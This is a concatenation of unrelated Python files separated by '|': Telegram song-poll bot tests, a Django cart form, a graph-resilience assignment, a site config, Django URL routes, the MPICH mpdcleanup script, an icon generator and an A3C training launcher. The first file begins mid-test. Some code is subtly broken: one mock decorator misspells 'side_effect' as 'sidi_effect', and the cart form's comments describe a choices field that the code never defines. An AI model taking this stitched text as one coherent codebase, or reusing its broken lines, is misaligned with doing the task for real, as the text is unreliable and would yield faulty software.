"/setDJ [mentioned user] set mentioned people a DJ (e.g. /setDJ @Admin)\n"
"/settings_mp3 on|off (e.g. /settings_mp3 or /settings_mp3 on)\n"
"/poll_status to print status of poll in this chat\n"
"<b>User commands</b>\n"
"/top [num] output top songs(e.g. /top 5)\n"
"/vote [num] vote for song from poll (e.g. /vote 5)\n"
)
self.assertEqual(capture,expected_output)
@patch('bot_top_ranking.utils.bot.get_chat_administrators',side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_create_poll(self, mock_message, smth, mock_admin):
state.config['poll_started'] = False
self.assertIsNone(handlers.create_poll(self.Message))
capture = get_capture()
music_poll = ''
for idx, song in enumerate(state.config["songs"]):
music_poll += f'{idx + 1}. {song["author"]} | {song["title"]}\n'
self.assertEqual(capture,music_poll)
@patch('bot_top_ranking.utils.bot.get_chat_administrators',side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_create_poll_raise(self,mock_message, smth, mock_admin):
state.config['poll_started'] = True
self.assertIsNone(handlers.create_poll(self.Message))
capture = get_capture()
expected_capture = "Previous poll hasn't finished yet. Type /finish or use pined Message"
self.assertEqual(capture, expected_capture)
@patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_get_songs_top_list(self,mock_message, smth):
params = [1, 12, 23, 567]
state.config["songs"] = get_songs()
state.config['poll_started'] = True
for param in params:
with self.subTest():
_message = message(self.User,self.Chat,f'/top {param}'.strip())
self.assertIsNone(handlers.get_songs_top_list(_message))
capture = get_capture()
music_poll = ''
top_list = create_top(state.config["songs"])
for idx, song in enumerate(top_list[:param]):
music_poll += f'{idx + 1}. {song["author"]} | {song["title"]} | {song["mark"]} Votes\n'
self.assertEqual(capture,music_poll)
@patch('bot_top_ranking.utils.bot.get_chat_administrators',side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_get_songs_top_list_wrong(self,mock_message,mockk_pin, mock_admin):
params = [0,'qwerty','']
state.config['poll_started'] = False
self.assertIsNone(handlers.create_poll(self.Message))
self.assertTrue(state.config["poll_started"])
for param in params:
with self.subTest():
_message = message(self.User,self.Chat,f'/top {param}'.strip())
self.assertIsNone(handlers.get_songs_top_list(_message))
capture = get_capture()
self.assertEqual(capture,'Incorrect input. Type /help to get information about commands')
def test_vote_for_song(self):
state.config["songs"] = get_songs()
state.config['poll_started'] = True
song_id = 1 # song #2 because array start from 0
begin_mark = state.config["songs"][song_id]["mark"]
vote_message = message(self.User,self.Chat,'/vote 2')
self.assertIsNone(handlers.vote_for_song(vote_message))
self.assertEqual(begin_mark+1, state.config["songs"][song_id]["mark"])
def test_unvote_song(self):
state.config["songs"] = get_songs()
state.config['poll_started'] = True
song_id = 2
begin_mark = state.config["songs"][song_id]["mark"]
vote_message = message(self.User,self.Chat,'/vote 3')
self.assertIsNone(handlers.vote_for_song(vote_message))
self.assertEqual(begin_mark+1, state.config["songs"][song_id]["mark"])
self.assertIsNone(handlers.vote_for_song(vote_message))
self.assertEqual(begin_mark, state.config["songs"][song_id]["mark"])
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_pervote_song(self,mock_message):
state.config['songs'] = get_songs()
state.config['poll_started'] = True
vote_message = message(self.User,self.Chat,'/vote 88889')
self.assertIsNone(handlers.vote_for_song(vote_message))
self.assertFalse(any([song['mark'] for song in state.config['songs']]))
capture = get_capture()
expected_output = f'Number should be less than {state.config["count_music"]} and greater than 0'
self.assertEqual(capture, expected_output)
@patch('bot_top_ranking.utils.bot.get_chat_administrators',side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
@patch('bot_top_ranking.help_functions._download_music_link',side_effect=mock_download_music_link)
@patch('bot_top_ranking.handlers.bot.send_audio', side_effect=mock_send_audio)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_pop_element_from_top_notupload(self,mock_message, mock_audio, down_link, pin, mock_admin):
state.config["songs"] = get_songs()
params = [1, 5, 12]
for param in params:
with self.subTest():
# print(state.config["songs"])
state.config['poll_started'] = True
poptop_message = message(self.User, self.Chat, f'/poptop {param}'.strip())
self.assertIsNone(handlers.pop_element_from_top(poptop_message))
capture = get_capture()
top_list = create_top(state.config["songs"])
expected_output = top_list[param-1]['author'] + ' | ' + top_list[param-1]['title']
self.assertEqual(capture,expected_output)
@patch('bot_top_ranking.utils.bot.get_chat_administrators',side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.upload_song', side_effect=mock_upload_song)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_pop_element_from_top_upload(self,mock_message, mock_upload, mock_admin):
state.config["songs"] = get_songs()
state.config['upload_flag'] = True
params = [1, 5, 12]
for param in params:
with self.subTest():
# print(state.config["songs"])
state.config['poll_started'] = True
poptop_message = message(self.User, self.Chat, f'/poptop {param}'.strip())
self.assertIsNone(handlers.pop_element_from_top(poptop_message))
capture = get_capture('upload_song.txt')
top_list = create_top(state.config["songs"])
expected_output = top_list[param-1]['author'] + ' | ' + top_list[param-1]['title']
self.assertEqual(capture,expected_output)
@patch('bot_top_ranking.utils.bot.get_chat_administrators',side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.bot.pin_chat_message', sidi_effect=mock_pin_chat_message)
@patch('bot_top_ranking.help_functions._download_music_link',side_effect=mock_download_music_link)
@patch('bot_top_ranking.handlers.bot.send_audio', side_effect=mock_send_audio)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_pop_element_from_top_empty(self,mock_message, mock_audio, down_link, pin, mock_admin):
state.config["songs"] = get_songs()
state.config['poll_started'] = True
poptop_message = message(self.User, self.Chat, '/poptop')
self.assertIsNone(handlers.pop_element_from_top(poptop_message))
capture = get_capture()
top_list = create_top(state.config["songs"])
expected_output = top_list[0]['author'] + ' | ' + top_list[0]['title']
self.assertEqual(capture,expected_output)
@patch('bot_top_ranking.utils.bot.get_chat_administrators',side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
@patch('bot_top_ranking.help_functions._download_music_link',side_effect=mock_download_music_link)
@patch('bot_top_ranking.handlers.bot.send_audio', side_effect=mock_send_audio)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_pop_element_from_top_unnumber(self,mock_message, mock_audio, down_link, pin, mock_admin):
state.config["songs"] = get_songs()
state.config['poll_started'] = True
poptop_message = message(self.User, self.Chat, '/poptop 22222')
self.assertIsNone(handlers.pop_element_from_top(poptop_message))
capture = get_capture()
top_list = create_top(state.config["songs"])
expected_output = f'Number should be less than {state.config["count_music"]} and greater than 0'
self.assertEqual(capture,expected_output)
@patch('bot_top_ranking.utils.bot.get_chat_administrators',side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.bot.unpin_chat_message',side_effect=mock_unpin_chat_message)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
@patch('bot_top_ranking.handlers.state.__init__',side_effect=mock_state_init)
def test_finish_poll(self,mock_message, mock_state, mock_unpin, mock_admin):
state.config["poll_started"] = True
self.assertIsNone(handlers.finish_poll(self.Message))
self.assertFalse(state.config['poll_started'])
self.assertFalse(any([song['mark'] for song in state.config['songs']]))
capture = get_capture()
expected_output = 'Poll was finished'
self.assertEqual(capture,expected_output)
@patch('bot_top_ranking.utils.bot.get_chat_administrators',side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_change_upload_flag(self, mock_message, mock_admin):
state.config["songs"] = get_songs()
state.config['poll_started'] = True
params = ['off', 'on', '', 123]
for param in params:
with self.subTest():
change_message = message(self.User, self.Chat, text=f'/settings_mp3 {param}'.strip())
started_upload_flag = state.config['upload_flag']
self.assertIsNone(handlers.change_upload_flag(change_message))
capture = get_capture()
expected_output = f'uploading songs is <b>{"Enabled" if state.config["upload_flag"] else "Disabled"}</b>'
if param == 'off':
self.assertFalse(state.config['upload_flag'])
self.assertEqual(capture, expected_output)
elif param == 'on':
self.assertTrue(state.config['upload_flag'])
self.assertEqual(capture, expected_output)
elif param == '':
self.assertTrue(not started_upload_flag == state.config['upload_flag'])
self.assertEqual(capture, expected_output)
else:
self.assertTrue(started_upload_flag == state.config['upload_flag'])
self.assertEqual(capture, expected_output)
@patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_get_poll_status(self, mock_message, mock_admin):
self.assertIsNone(handlers.get_poll_status(self.Message))
capture = get_capture()
expected_output = (
'Poll status\n'
'———————————\n'
f'Poll started: {state.config["poll_started"]}\n'
f'Upload mp3: {"on" if state.config["upload_flag"] else "off"}'
)
self.assertEqual(capture, expected_output)
@patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_set_dj_by_user_id(self, mock_message, mock_admin):
state.config["users_for_promoting"] = []
user_tag = bot.get_me().username
mentioned_message = message(self.User, self.Chat, f'/setDJ @{user_tag}')
self.assertIsNone(handlers.set_dj_by_user_id(mentioned_message))
self.assertEqual(state.config["users_for_promoting"][-1], user_tag)
capture = get_capture()
expected_output = f'@{user_tag} type /becomeDJ. It\'s privileges only for you ^_^'
self.assertEqual(capture, expected_output)
@patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_set_dj_by_user_id_incorrect(self, mock_message, mock_admin):
mentioned_message = message(self.User, self.Chat, r'/setDJ @')
self.assertIsNone(handlers.set_dj_by_user_id(mentioned_message))
capture = get_capture()
expected_output = r'Incorrect input. Type /help to get information about commands'
self.assertEqual(capture, expected_output)
@patch('bot_top_ranking.handlers.bot.set_chat_administrator_custom_title', side_effect=mock_set_chat_administrator_custom_title)
@patch('bot_top_ranking.handlers.bot.promote_chat_member', side_effect=mock_promote_chat_member)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_become_dj(self, mock_message, mock_promote, mock_title):
user_tag = bot.get_me().username
state.config['users_for_promoting'] = [user_tag]
self.assertIsNone(handlers.become_dj(self.Message))
self.assertFalse(state.config['users_for_promoting'])
capture = get_capture()
expected_output = f'@{user_tag} You have been promoted to DJ. Congratulate 🏆🏆🏆'
self.assertEqual(capture, expected_output)
@patch('bot_top_ranking.handlers.bot.set_chat_administrator_custom_title', side_effect=mock_set_chat_administrator_custom_title)
@patch('bot_top_ranking.handlers.bot.promote_chat_member', side_effect=mock_promote_chat_member)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_become_dj_cannot(self, mock_message, mock_promote, mock_title):
state.config['users_for_promoting'] = ['ababababababab']
self.assertIsNone(handlers.become_dj(self.Message))
capture = get_capture()
expected_output = "You cannot use this command"
self.assertEqual(capture, expected_output)
@patch('bot_top_ranking.handlers.bot.set_chat_administrator_custom_title', side_effect=mock_set_chat_administrator_custom_title)
@patch('bot_top_ranking.handlers.bot.promote_chat_member', side_effect=mock_promote_chat_member_raise)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_become_dj_raise(self, mock_message, mock_promote, mock_title):
state.config['users_for_promoting'] = [bot.get_me().username]
self.assertIsNone(handlers.become_dj(self.Message))
capture = get_capture()
expected_output = 'You are admin. Why do you try to do it??? (╮°-°)╮┳━━┳ ( ╯°□°)╯ ┻━━┻'
self.assertEqual(capture, expected_output)
|
from django import forms
class AddToCartForm(forms.Form):
# The form for entering the amount of a book
# to add.
# choices is an option that defines what values
# the user can populate the field with; in this
# case I've set it to be 1-99, i.e. a user can't
# add less than one copy of a
# book or more than 99 to his
# cart at once
amount = 1
# This field allows us to specify whether we want
# to change the number of books in a cart to a specific
# number (in the case of True) or simply add the amount we specified to the
# existing total (in the case of False). This is specified by us,
# so we hide it from the user with the forms.HiddenInput widget
change_amount = forms.BooleanField(required=False, initial=False, widget=forms.HiddenInput)
|
"""
Question 1
"""
import assignment2 as a
import graph_operations as go
import matplotlib.pyplot as plt
# Find probability p such that the ER graph will have approximately the
# same number of edges as the computer network.
NODES = 1239
EDGES = 3047
NETWORK_GRAPH = a.load_graph(a.NETWORK_URL)
# EDGE_PROB is probability p for ER graph
POSS_EDGES = float(NODES) * (NODES - 1) / 2
EDGE_PROB = float(EDGES) / POSS_EDGES
er_graph = a.make_er_graph(NODES, EDGE_PROB)
# AVG_OUTDEGREE is m for the UPA graph
OUTDEGREE_DICT = go.compute_out_degrees(NETWORK_GRAPH)
HALF_AVG_OUTDEGREE = int(round(go.avg_out_degree(OUTDEGREE_DICT) / 2))
upa_graph = a.make_upa_graph(NODES, HALF_AVG_OUTDEGREE)
network_random = a.random_order(NETWORK_GRAPH)
er_random = a.random_order(er_graph)
upa_random = a.random_order(upa_graph)
network_resilience = go.compute_resilience(a.copy_graph(NETWORK_GRAPH), network_random)
er_resilience = go.compute_resilience(a.copy_graph(er_graph), er_random)
upa_resilience = go.compute_resilience(a.copy_graph(upa_graph), upa_random)
print "Network Edges:", EDGES
print "Network undirected:", a.check_undirected(NETWORK_GRAPH)
print "Check Network Edges:", a.check_number_edges(NETWORK_GRAPH)
print "res len:", len(network_resilience)
print "\nER info:"
print "p:", EDGE_PROB
print "er undirected:", a.check_undirected(er_graph)
print "Number edges:", a.check_number_edges(er_graph)
print "er res len:", len(er_resilience)
print "\nUPA info:"
print "m:", HALF_AVG_OUTDEGREE
print "upa undirected:", a.check_undirected(upa_graph)
print "Number UPA Edges:", a.check_number_edges(upa_graph)
print "upa res len:", len(upa_resilience)
def plot_resiliences(nodes, network_vals, er_vals, upa_vals):
"""
Plot an example with two curves with legends
"""
node_vals = range(0, nodes)
plt.plot(node_vals, network_vals, '-b', label='Network')
plt.plot(node_vals, er_vals, '-r', label='ER: p = ' + str(EDGE_PROB))
plt.plot(node_vals, upa_vals, '-g', label='UPA: m = ' + str(HALF_AVG_OUTDEGREE))
plt.legend(loc='upper right')
plt.ylabel('Size of Largest Connected Component')
plt.xlabel('Number of Nodes Removed')
plt.grid(True)
plt.title('Comparison of Graph Resilience\nMeasured by Largest Connected Component vs Randomly Removed Nodes\n')
plt.show()
plot_resiliences(NODES, network_resilience, er_resilience, upa_resilience)
|
# -*- coding: utf-8 -*-
#: The title of this site
SITE_TITLE='HasGeek Funnel'
#: Support contact email
SITE_SUPPORT_EMAIL = 'test@example.com'
#: TypeKit code for fonts
TYPEKIT_CODE=''
#: Google Analytics code UA-XXXXXX-X
GA_CODE=''
#: Database backend
SQLALCHEMY_DATABASE_URI = 'sqlite:///test.db'
#: Secret key
SECRET_KEY = 'make this something random'
#: Timezone
TIMEZONE = 'Asia/Calcutta'
#: LastUser server
LASTUSER_SERVER = 'https://auth.hasgeek.com/'
#: LastUser client id
LASTUSER_CLIENT_ID = ''
#: LastUser client secret
LASTUSER_CLIENT_SECRET = ''
#: Used for attribution when shared a proposal on twitter
TWITTER_ID = "hasgeek"
#: Mail settings
#: MAIL_FAIL_SILENTLY : default True
#: MAIL_SERVER : default 'localhost'
#: MAIL_PORT : default 25
#: MAIL_USE_TLS : default False
#: MAIL_USE_SSL : default False
#: MAIL_USERNAME : default None
#: MAIL_PASSWORD : default None
#: DEFAULT_MAIL_SENDER : default None
MAIL_FAIL_SILENTLY = False
MAIL_SERVER = 'localhost'
DEFAULT_MAIL_SENDER = ('Bill Gate', 'test@example.com')
# Required for Flask-Mail to work.
MAIL_DEFAULT_SENDER = DEFAULT_MAIL_SENDER
#: Logging: recipients of error emails
ADMINS=[]
#: Log file
LOGFILE='error.log'
#: Messages (text or HTML)
WELCOME_MESSAGE = "The funnel is a space for proposals and voting on events. Pick an event to get started."
|
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from django.urls import re_path
from django.views.static import serve
from django.conf.urls.i18n import i18n_patterns
from django.utils.translation import gettext_lazy as _
from accounts.views import IndexPageView, AboutView, ChangeLanguageView, set_timezone
admin.site.site_header = 'CustomUser Administration'
admin.site.site_title = 'CustomUser Site Admin'
admin.site.index_title = 'CustomUser Site Admin Home'
urlpatterns = [
path('admin/', admin.site.urls),
path('', IndexPageView.as_view(), name='index'),
path('about/', AboutView.as_view(), name='about'),
path('accounts/', include('accounts.urls')),
path('rest-auth/', include('rest_auth.urls')),
path('i18n/', include('django.conf.urls.i18n')),
path('language/', ChangeLanguageView.as_view(), name='change_language'),
path('timezone/', set_timezone, name='set_timezone'),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
urlpatterns += [
re_path(r'^media/(?P<path>.*)$', serve, {
'document_root': settings.MEDIA_ROOT,
}),
] |
#!/usr/bin/env python
#
# (C) 2001 by Argonne National Laboratory.
# See COPYRIGHT in top-level directory.
#
## NOTE: we do NOT allow this pgm to run via mpdroot
"""
usage: mpdcleanup [-h] [-v] [-f <hostsfile>] [-r <rshcmd>] [-u <user>] [-c <cleancmd>] [-k 'killcmd'] [-n <num_from_hostsfile>]
or: mpdcleanup [--help] [--verbose] [--file=<hostsfile>] [--rsh=<rshcmd>] [--user=<user>]
[--clean=<cleancmd>] [--kill="killcmd"]
Removes the Unix socket on local (the default) and remote machines
This is useful in case the mpd crashed badly and did not remove it, which it normally does
"""
from time import ctime
__author__ = "Ralph Butler and Rusty Lusk"
__date__ = ctime()
__version__ = "$Revision: 1.11 $"
__credits__ = ""
import sys, os, socket
from getopt import getopt
from mpdlib import mpd_get_my_username, mpd_same_ips, mpd_set_tmpdir
def mpdcleanup():
rshCmd = 'ssh'
user = mpd_get_my_username()
killCmd = '' # perhaps '~/bin/kj mpd' (in quotes)
cleanCmd = 'rm -f '
hostsFile = ''
verbose = 0
numFromHostsFile = 0 # chgd below
try:
(opts, args) = getopt(sys.argv[1:], 'hvf:r:u:c:k:n:',
['help', 'verbose', 'file=', 'rsh=', 'user=', 'clean=','kill='])
except:
print 'invalid arg(s) specified'
usage()
else:
for opt in opts:
if opt[0] == '-r' or opt[0] == '--rsh':
rshCmd = opt[1]
elif opt[0] == '-u' or opt[0] == '--user':
user = opt[1]
elif opt[0] == '-f' or opt[0] == '--file':
hostsFile = opt[1]
elif opt[0] == '-h' or opt[0] == '--help':
usage()
elif opt[0] == '-v' or opt[0] == '--verbose':
verbose = 1
elif opt[0] == '-n':
numFromHostsFile = int(opt[1])
elif opt[0] == '-c' or opt[0] == '--clean':
cleanCmd = opt[1]
elif opt[0] == '-k' or opt[0] == '--kill':
killCmd = opt[1]
if args:
print 'invalid arg(s) specified: ' + ' '.join(args)
usage()
if os.environ.has_key('MPD_CON_EXT'):
conExt = '_' + os.environ['MPD_CON_EXT']
else:
conExt = ''
if os.environ.has_key('MPD_TMPDIR'):
tmpdir = os.environ['MPD_TMPDIR']
else:
tmpdir = '/tmp'
cleanFile = tmpdir + '/mpd2.console_' + user + conExt
if rshCmd == 'ssh':
xOpt = '-x'
else:
xOpt = ''
try: localIP = socket.gethostbyname_ex(socket.gethostname())[2]
except: localIP = 'unknownlocal'
if hostsFile:
try:
f = open(hostsFile,'r')
except:
print 'Not cleaning up on remote hosts; file %s not found' % hostsFile
sys.exit(0)
hosts = f.readlines()
if numFromHostsFile:
hosts = hosts[0:numFromHostsFile]
for host in hosts:
host = host.strip()
if host[0] != '#':
try: remoteIP = socket.gethostbyname_ex(host)[2]
except: remoteIP = 'unknownremote'
if localIP == remoteIP: # local machine handled last below loop
continue
cmd = '%s %s -n %s %s %s &' % (rshCmd, xOpt, host, cleanCmd, cleanFile)
if verbose:
print 'cmd=:%s:' % (cmd)
os.system(cmd)
if killCmd:
cmd = "%s %s -n %s \"/bin/sh -c '%s' &\"" % (rshCmd, xOpt, host, killCmd)
if verbose:
print "cmd=:%s:" % (cmd)
os.system(cmd)
## clean up local machine last
cmd = '%s %s' % (cleanCmd,cleanFile)
if verbose:
print 'cmd=:%s:' % (cmd)
os.system(cmd)
if killCmd:
if verbose:
print 'cmd=:%s:' % (killCmd)
os.system(killCmd)
def usage():
print __doc__
sys.exit(-1)
if __name__ == '__main__':
mpdcleanup()
|
import os
import sys
import re
import subprocess
import codecs
from PIL import Image
def GetFileContent (fileName):
file = codecs.open (fileName, 'r', 'utf-8')
content = file.read ()
file.close ()
return content
def SetFileContent (fileName, content):
file = codecs.open (fileName, 'w', 'utf-8')
file.write (content)
file.close ()
def GenerateColoredSvg (sourceIconPath, coloredSvgIconPath, color):
sourceContent = GetFileContent (sourceIconPath)
coloredSvgContent = sourceContent
coloredSvgContent = re.sub (r'#[0-9a-fA-F]{6}', color, coloredSvgContent)
SetFileContent (coloredSvgIconPath, coloredSvgContent)
def GeneratePng (inkscapePath, sourceSvgPath, resultPngPath, size):
command = [
inkscapePath,
'--export-png=' + resultPngPath,
'--export-width=' + str (size),
'--export-height=' + str (size),
sourceSvgPath
]
subprocess.call (command)
def GenerateColoredSvgsFromSvgs (sourceFolder, targetFolder, color):
if not os.path.exists (targetFolder):
os.makedirs (targetFolder)
for svgName in os.listdir (sourceFolder):
sourceIconPath = os.path.join (sourceFolder, svgName)
coloredSvgIconPath = os.path.join (targetFolder, svgName)
GenerateColoredSvg (sourceIconPath, coloredSvgIconPath, color)
def GeneratePngsFromSvgs (inkscapePath, iconsPath, svgFolderName, pngFolderPrefix, sizes):
svgIconsPath = os.path.join (iconsPath, svgFolderName)
for svgName in os.listdir (svgIconsPath):
for size in sizes:
pngIconsPath = os.path.join (iconsPath, pngFolderPrefix + str (size))
if not os.path.exists (pngIconsPath):
os.makedirs (pngIconsPath)
svgBaseName = os.path.splitext (svgName)[0]
sourceIconPath = os.path.join (svgIconsPath, svgName)
targetPngPath = os.path.join (pngIconsPath, svgBaseName + '.png')
GeneratePng (inkscapePath, sourceIconPath, targetPngPath, size)
def GeneratePngsFromSvgs (inkscapePath, sourcePath, targetPath, size):
if not os.path.exists (targetPath):
os.makedirs (targetPath)
for svgName in os.listdir (sourcePath):
svgBaseName = os.path.splitext (svgName)[0]
sourceIconPath = os.path.join (sourcePath, svgName)
targetPngPath = os.path.join (targetPath, svgBaseName + '.png')
GeneratePng (inkscapePath, sourceIconPath, targetPngPath, size)
def GenerateBmpsFromPngs (sourcePath, targetPath):
if not os.path.exists (targetPath):
os.makedirs (targetPath)
for pngName in os.listdir (sourcePath):
pngBaseName = os.path.splitext (pngName)[0]
sourcePngPath = os.path.join (sourcePath, pngName)
targetBmpPath = os.path.join (targetPath, pngBaseName + '.bmp')
image = Image.open (sourcePngPath)
image.save (targetBmpPath)
def Main (argv):
currentDir = os.path.dirname (os.path.abspath (__file__))
os.chdir (currentDir)
if len (argv) != 2:
print ('usage: GenerateIcons.py <inkscapePath>')
print ('example: GenerateIcons.py "C:\Program Files\Inkscape\inkscape.com"')
return 1
inkscapePath = sys.argv[1]
iconDescriptors = [
{
'path' : os.path.abspath (os.path.join ('..', 'Documentation', 'CommandIcons')),
'settings' : {
'colors' : [
{ 'name' : 'gray', 'color' : '#BBBBBB' }
],
'pngs' : [
{
'color' : None,
'sizes' : [18, 36],
'bmp' : True
},
{
'color' : 'gray',
'sizes' : [18, 36],
'bmp' : True
}
]
}
},
{
'path' : os.path.abspath (os.path.join ('..', 'Documentation', 'NodeIcons')),
'settings' : {
'colors' : [
{ 'name' : 'white', 'color' : '#FAFAFA' }
],
'pngs' : [
{
'color' : None,
'sizes' : [18, 36],
'bmp' : True
},
{
'color' : 'white',
'sizes' : [18, 36],
'bmp' : True
}
]
}
}
]
for iconDescriptor in iconDescriptors:
svgIconsPath = os.path.join (iconDescriptor['path'], 'svg')
for color in iconDescriptor['settings']['colors']:
coloredSvgIconsPath = os.path.join (iconDescriptor['path'], 'svg_' + color['name'])
GenerateColoredSvgsFromSvgs (svgIconsPath, coloredSvgIconsPath, color['color'])
for png in iconDescriptor['settings']['pngs']:
svgSourcePath = os.path.join (iconDescriptor['path'], 'svg')
colorStr = ''
if png['color'] != None:
colorStr = '_' + png['color']
svgSourcePath = os.path.join (iconDescriptor['path'], 'svg' + colorStr)
for size in png['sizes']:
pngTargetPath = os.path.join (iconDescriptor['path'], 'png' + colorStr + '_' + str (size))
GeneratePngsFromSvgs (inkscapePath, svgSourcePath, pngTargetPath, size)
if png['bmp']:
bmpTargetPath = os.path.join (iconDescriptor['path'], 'bmp' + colorStr + '_' + str (size))
GenerateBmpsFromPngs (pngTargetPath, bmpTargetPath)
return 0
sys.exit (Main (sys.argv))
|
import tensorflow as tf
import threading
import datetime
import signal
import os
from target_driven_method.networks.A3C_networks import A3CFFNetwork
from target_driven_method.networks.target_driven_navigation_networks import TargetDrivenFFNetwork
from target_driven_method.networks.A3C_networks import A3CLSTMNetwork
from target_driven_method.networks.target_driven_navigation_networks import TargetDrivenLSTMNetwork
from training_thread import A3CTrainingThread
from utils.ops import log_uniform
from Grid2DEnvAdapterForTargetDriven import Grid2DEnvAdapter
from constants import PARALLEL_SIZE
from constants import INITIAL_ALPHA_LOW
from constants import INITIAL_ALPHA_HIGH
from constants import INITIAL_ALPHA_LOG_RATE
from constants import MAX_TIME_STEP
from constants import CHECKPOINT_DIR
from constants import LOG_DIR
from constants import RMSP_EPSILON
from constants import RMSP_ALPHA
from constants import USE_GPU
from constants import USE_LSTM
from constants import config
if __name__ == '__main__':
device = "/gpu:0" if USE_GPU else "/cpu:0"
global_t = 0
stop_requested = False
unique_name = "{}__{}".format(config['name'], datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
EXPERIMENT_CHECKPOINT_DIR = CHECKPOINT_DIR + "/" + unique_name
EXPERIMENT_LOG_DIR = LOG_DIR + "/" + unique_name
if not os.path.exists(EXPERIMENT_CHECKPOINT_DIR):
os.makedirs(EXPERIMENT_CHECKPOINT_DIR)
if not os.path.exists(EXPERIMENT_LOG_DIR):
os.makedirs(EXPERIMENT_LOG_DIR)
initial_learning_rate = log_uniform(INITIAL_ALPHA_LOW, INITIAL_ALPHA_HIGH,
INITIAL_ALPHA_LOG_RATE)
env = Grid2DEnvAdapter(config)
global_network_scope = "global"
if config['model'] == "TDN":
if USE_LSTM:
global_network = TargetDrivenLSTMNetwork(
input_size=env.obs_size,
device=device,
network_scope=global_network_scope)
else:
global_network = TargetDrivenFFNetwork(
input_size=env.obs_size,
device=device,
network_scope=global_network_scope)
else:
if USE_LSTM:
global_network = A3CLSTMNetwork(
input_size=env.obs_size,
device=device,
network_scope=global_network_scope)
else:
global_network = A3CFFNetwork(
input_size=env.obs_size,
device=device,
network_scope=global_network_scope)
learning_rate_input = tf.placeholder("float")
grad_applier = tf.train.RMSPropOptimizer(
learning_rate=learning_rate_input,
decay=RMSP_ALPHA,
momentum=0.0,
epsilon=RMSP_EPSILON)
# instantiate each training thread
training_threads = []
for i in range(PARALLEL_SIZE):
training_thread = A3CTrainingThread(
config,
env,
i,
global_network_scope,
initial_learning_rate,
learning_rate_input,
grad_applier,
MAX_TIME_STEP,
device=device
)
training_threads.append(training_thread)
# prepare session
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True))
init = tf.global_variables_initializer()
sess.run(init)
# create tensorboard summaries
summary_op = dict()
summary_placeholders = dict()
for i in range(PARALLEL_SIZE):
key = unique_name + "_thread_" + str(i)
# summary for tensorboard
episode_reward_input = tf.placeholder("float")
episode_length_input = tf.placeholder("float")
episode_mean_loss_input = tf.placeholder("float")
scalar_summaries = [
tf.summary.scalar(key + "/Episode Reward", episode_reward_input),
tf.summary.scalar(key + "/Episode Length", episode_length_input),
tf.summary.scalar(key + "/Episode Mean Loss", episode_mean_loss_input),
]
summary_op[key] = tf.summary.merge(scalar_summaries)
summary_placeholders[key] = {
"episode_reward_input": episode_reward_input,
"episode_length_input": episode_length_input,
"episode_mean_loss_input": episode_mean_loss_input,
"learning_rate_input": learning_rate_input
}
summary_writer = tf.summary.FileWriter(EXPERIMENT_LOG_DIR, sess.graph)
# init or load checkpoint with saver
# if you don't need to be able to resume training, use the next line instead.
# it will result in a much smaller checkpoint file.
# saver = tf.train.Saver(max_to_keep=10, var_list=global_network.get_vars())
saver = tf.train.Saver(max_to_keep=1000)
def train_function(parallel_index):
global global_t
training_thread = training_threads[parallel_index]
last_global_t = 0
key = unique_name + "_thread_" + str(parallel_index)
while global_t < MAX_TIME_STEP and not stop_requested:
diff_global_t = training_thread.process(
sess, global_t, summary_writer, summary_op[key],
summary_placeholders[key])
global_t += diff_global_t
# periodically save checkpoints to disk and test performance
if parallel_index == 0 and global_t - last_global_t > 10000:
print('Save checkpoint at timestamp %d' % global_t)
saver.save(
sess,
EXPERIMENT_CHECKPOINT_DIR + '/' + 'checkpoint',
global_step=global_t)
last_global_t = global_t
def signal_handler(signal, frame):
global stop_requested
print('You pressed Ctrl+C!')
stop_requested = True
train_threads = []
for i in range(PARALLEL_SIZE):
train_threads.append(
threading.Thread(target=train_function, args=(i, )))
signal.signal(signal.SIGINT, signal_handler)
# start each training thread
for t in train_threads:
t.start()
